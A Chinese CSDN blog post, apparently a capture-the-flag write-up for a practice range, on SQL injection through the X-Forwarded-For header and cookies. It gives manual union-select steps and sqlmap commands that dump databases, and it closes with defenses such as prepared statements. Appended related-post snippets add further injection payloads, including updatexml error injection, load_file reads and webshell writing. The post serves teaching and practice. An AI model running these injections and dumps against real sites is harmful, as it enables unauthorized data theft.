安鸾靶场X-Forwarded-For注入头注入,Cooike注入训练,手注+sqlmap操作

最新推荐文章于 2024-06-13 17:26:36 发布
最新推荐文章于 2024-06-13 17:26:36 发布
阅读量945 收藏 1
点赞数 1
分类专栏: CTF -WEB 学习 文章标签: sql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122214112
版权

SQL注入 XFF注入 Cookie注入 sqlmap 防御策略
关键词由CSDN通过智能技术生成

前言:凡是直接将数据带入数据库查询的,都有可能会导致sql注入。

后台服务器存储着cooike,XFF头的信息,当我们每次发包与后台交互时,后台就会将这我们的数据带入数据库中查询,就会造成Cooike注入,XFF注入。

虽然题目好像出了点问题,但不妨碍我们学习。

目录

xff注入

手注

 sqlmap

Cooike注入

手注

 sqlmap命令

方法一

方法二

xff注入

题目链接:http://www.whalwl.work:8010/

进入之后直接用bp抓包,放在repeater(重复)模块

 这样抓包居然没看到XFF头,看了别人的write up怎么都有的啊?

没办法,自己加一个呗。

加了个单引号报错,说明存在注入。 (到这里其实就可以sqlmap跑了)

手注

怕有些同学可能不熟悉,那就像我们正常手注来几个步骤。其实有注入点后,方法都是一样的。

二分法求得注入字段为5.

 select 1,2,3,4,5 找到可注入字段

 为2,3

接下来正常手注是能得到结果的。给大家看一下结果,因为懒不愿意一步一步找(所以先用了sqlmap 跑出来了表和字段名)

 

 sqlmap

抓包,添加一个X-Forwarded-For头,然后保存为,1.txt(我的是在kail的桌面)

xff头使用sqlmap注入(心血来潮的分享)_HolicU的博客-CSDN博客_添加xff头

注意这里X-Forwarded-For内容改为 * 提示sqlmap这里为注入点(话说上面的哥们挺机智的,哈哈)

 

(edg㉿EDG)-[~/桌面]
└─$ sqlmap -r 1.txt --dbs        

跑出数据库

估计在xff这个数据库中 ,也不墨迹。--dump输出。

sqlmap -r 1.txt -D xff --dump

Cooike注入

地址Cookie注入

http://www.whalwl.work:8009

这道题也有点离谱,做这道题的时候发现Cooike这个字段表。

 

结果再做就给我整没了,怎么抓包都抓不到cooike。

学着上面的方法加一个 cookie字段,试着注入,咋样都不回显?

手注

这又到考验我们的时候了(其实按照正常方法和上面的XFF手动注入是能得到结果的,但是这里题目又又又出现了问题,导致我和别人的write up 使用同样的操作,得不到结果)

 

 sqlmap命令

既然存在注入的话,如果它只是不会显的话,考虑(报错注入??考点都不一样好么,又不是CTF)那肯定使用sqlmap 跑

方法一

那么用上面xff的老方法跑其实也行的。(下图复制到1.txt)

sqlmap -r 1.txt -dbs

 

 

方法二

sqlmap -u http://www.whalwl.work:8009/user.php? --cookie "id=1"  --dbs

按照这个方法也能跑出

sqlmap -u http://www.whalwl.work:8009/user.php? --cookie "id=1"  -D cookie -T this_flag -dump

最后结果:

 

防御方法:对于所有sql注入通用

1.预编译(简单又有效的方法)PreparedStatement

采用预编译语句集,它内置了处理SQL注入的能力,只要使用它的setXXX方法传值即可

2.使用正则表达式过滤传入的参数

存在绕过的可能

现在sql注入已经非常少了,虽然危害大,但是防御简单

本人水平有限,欢迎评论区指出不足。

AAAAAAAAAAAA66
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF练习:SQL注入之X-Forwarded-For报
qq_43233085的博客
11-28 983
CTF练习:SQL注入之get参数注入环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本(copy)拿到靶机shell(copy) 靶机地址: 链接: https://pan.baidu.com/s/1u-br8L4Lk4X7EGS7kROhMQ 提取码: 2fmj 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172....
安鸾靶场 SQL注入 报错注入03(最新)
2301_76683178的博客
07-28 267
我们构造出一个报错语句1' or updatexml(1,concat(0x7e,(select version())),0)#通过包数据我们知道,注入点在cookie的uname那里,而且发现这是一个64编码的。把他转成64进制后放进uname里面,重发,通过回显我们知道了这个版本信息。发现注入点其实就在这个页面,而且要右键重新加载才能抓到这个代注入点的包。flag在系统根目录,我们只需要load_file('/flag')在登陆页面时,输入1',(不输入密码),页面报错了。
安鸾靶场SQL注入进阶
2301_76683178的博客
08-11 202
利用sql注入尝试写一个木马进去,结果发现不行,看报错信息,有些东西被过滤了。打开一个图片的链接,查看这个文件夹,发现是可以上传文件的文件夹。创建失败了,可能我之前已经创建过了这个函数了吧,不太了解。尝试提权,先把可以上传函数库文件夹位置的地方找出来。看看有没有可以上传文件的文件夹,尝试写一个木马上去。拿到题目,看到这个页面,其实是一个伪静态。菜刀连上去后发现flag,但是看不了。虚拟终端看了一下,是apache用户。把要写的木马编码成16进制绕过,成功。不管了,直接打开flag。函数也是可以正常用的。
安鸾学院靶场——安全基础
最新发布
qq_55202378的博客
06-13 1308
后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。添加完后,根据icon,可以看出这是一个python打包成的exe程序。看wp是由web.zip文件的,但是这里没有,所以搞不定了。下载提供的flag.zip和wordlist.txt,使用。:在vsftpd 2.3.4版本中,在登录输入用户名时输入。的返回包,可以拿到包含flag的txt文件。九阴真经上卷找不到,似乎被删了,只有下卷。类似于笑脸的符号,会导致服务处理开启。flag在whalwl数据库中。
特别的sql注入方式-DNSlog注入--安鸾靶场练习 DNSlog注入学习
AAAAAAAAAAAA66的博客
01-05 2216
DNSlog注入 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 利用的场景 存在sql注入 无法获得回显 对目标网站可以发起请求 简单的来说就是可以利用 load_file() 函数,在存在注入的情况下将数据库中的信息带出我们的域名日志中(dnslog).详细的可以看下方链接 DNSLog在MySQL注入
http细节
evsqiezi
07-25 427
X-Forwarded-For 通过名字就知道,X-Forwarded-For 是一个 HTTP 扩展部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Ex
X-Forwarded-For sql注入
good good study
01-12 4065
什么是X-Forwarded-For X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求字段。当今多数缓存服务器的使用者为大型ISP,为了通过缓存的方式来降低他们的外部带宽,他们常常通过鼓励或强制用户使用代理服务器来接入互联网。有些情况下, 这些代理服务器是透明代理, 用户甚至不知道自己正在使用代理上网。 如果没有XFF或者另外一种相似的技术,所有通过代理服务器的连接只会显示代理服务器的IP地址(而非连接发起的原始I
sql注入x-forwarded-for
Vinson的博客
09-29 388
靶机192.168.1.103 攻击机192.168.1.108 nmap -sV 192.168.1.103 80/tcp open http nginx 0.7.67 avws漏洞扫描器 漏洞利用 利用sqlmap sqlmap -u url --headers="X-Forwarded-For:*" --dbs --batch sqlmap -u http://1...
X-Forwarded-For火狐插件
01-10
X-Forwarded-For火狐插件
Chrome插件:X-Forwarded-For Header
12-15
标题“Chrome插件:X-Forwarded-For Header”揭示了本文将深入探讨一个专门针对Google Chrome浏览器的扩展应用,该插件的主要功能是处理和设置HTTP中的`X-Forwarded-For`字段。`X-Forwarded-For`(简称XFF)是一...
forwarded:解析HTTP X-Forwarded-For标
05-11
从请求中解析X-Forwarded-For标。 以相反的顺序返回地址数组,包括req的套接字地址(即索引0是套接字地址,最后一个索引是最远的地址,通常是最终用户)。 测验 $ npm test 执照 麻省理工学院
X-Forwarded-For Header_0.6.2_0.zip
08-24
此扩展允许您快速更新各种 X-Forwarded-For、X-Originating-IP、X-Remote-IP 和 X-Remote-Addr HTTP 标 打开Chrome浏览器的扩展程序: 地址栏直接输入:chrome://extensions/ 把下载到的文件解压后,点击加载已...
x-forwarded-forheader1.0.1.1.1
05-01
x-forwarded-forheader1.0.1.1.1火狐老插件,可以直接本地安装在旧版火狐上面,可以用的。
安鸾靶场】cmseasy&内网渗透 (500分)
信安是不可或缺的一部分!
10-10 1132
等后面靶场重置,总体思路是这样的但是有点小问题,这个redis拿shell其实挺麻烦的,之前打靶场时也遇到过写入任务计划但没成功,我重置多次后成功了,这个运行不太好,也可能是frp的配置有问题。找了半天在:http://106.15.50.112:8021/config/tag/category_27.php。这里不能使用反弹shell方式,因为有可能192.168.112.3只有内网无外网环境:这里只能使用写入私钥方式。frp工具地址:https://github.com/fatedier/frp。
xff使用sqlmap注入(心血来潮的分享)
HolicU的博客
01-23 1999
今天看见墨者学院的一个靶场 x-forwarded-for注入靶场 我很少逛墨者学院,一直在看书 激动的我,测试了下,咳咳,小白文,大佬勿喷 开始进行判断是否存在xff注入 xff是记录我们的ip,所以~~~~ 所以先随便输入下账号密码,然后再抓个包,看下返回包 于是我手动添加下X-Forwarded-For,看是否可以伪造ip 发现我随便写下就可以了,那说明这个地方有交互 先把这个数据包复...
CTF-SQL注入(X-Forwarded-For)
su__xiaoyan的博客
12-24 573
SQL注入 当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 X-Forwarded-For HTTP请求部字段,用来表示 HTTP 请求端真实 IP。 XFF注入/ X-Forwarded-For XFF,是X-Forwarded-for的缩写,XFF注入SQL注入的一种,该注入原理是通过修改X-Forwarded-for对带入系统的dns进行sql
安鸾靶场 sql注入--SQL数字型GET注入01
s666789s的博客
04-06 583
1.SQL数字型GET注入01 (1)输入1’报错,输入-1返回正常,构造payload (2)判断显示位 -1 order by 3# -1 union select 1,2,3# (3)爆库:-1 union select 1,database(),3# (4)爆表:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘dwvs’# (5)爆列:-1 union se
SQL注入:X-Forwarded-For注入
zh的博客
10-11 498
靶场地址:http://www.whalwl.host:8010/ 解题准备:本题需要使用burpsuite抓包 解题思路: 1、根据提示,直接抓包,添加X-Forwarded-For参数 a' 2、根据报错,确定闭合符为 ' 构造:a' order by 6# 5正常,6错误,确定字段数为5 3、构造联合查询,发现有2,3回显 4、获得user和database 5、后续注入通过联合查询可以很快获取flag ...
CTF-SQL注入-X-Forwarded-For报文
whatiwhere的博客
12-02 1320
nmap -sV xxxxx nmap -T4 -A -v xxxx nikto -host http://192.168.173.134/ 发现了后台登陆地址,但弱口令无法登陆 使用awvs扫描 安全漏洞 高危漏洞 盲注 使用sqlmap进行 注入 sqlmap -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” -...
x-forwarded-for注入漏洞
03-16
x-forwarded-for注入漏洞是一种网络安全漏洞,攻击者可以通过伪造HTTP请求中的x-forwarded-for字段,来欺骗服务器认为请求来自于受信任的IP地址,从而绕过IP地址过滤等安全措施,进而进行攻击。这种漏洞常见于代理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值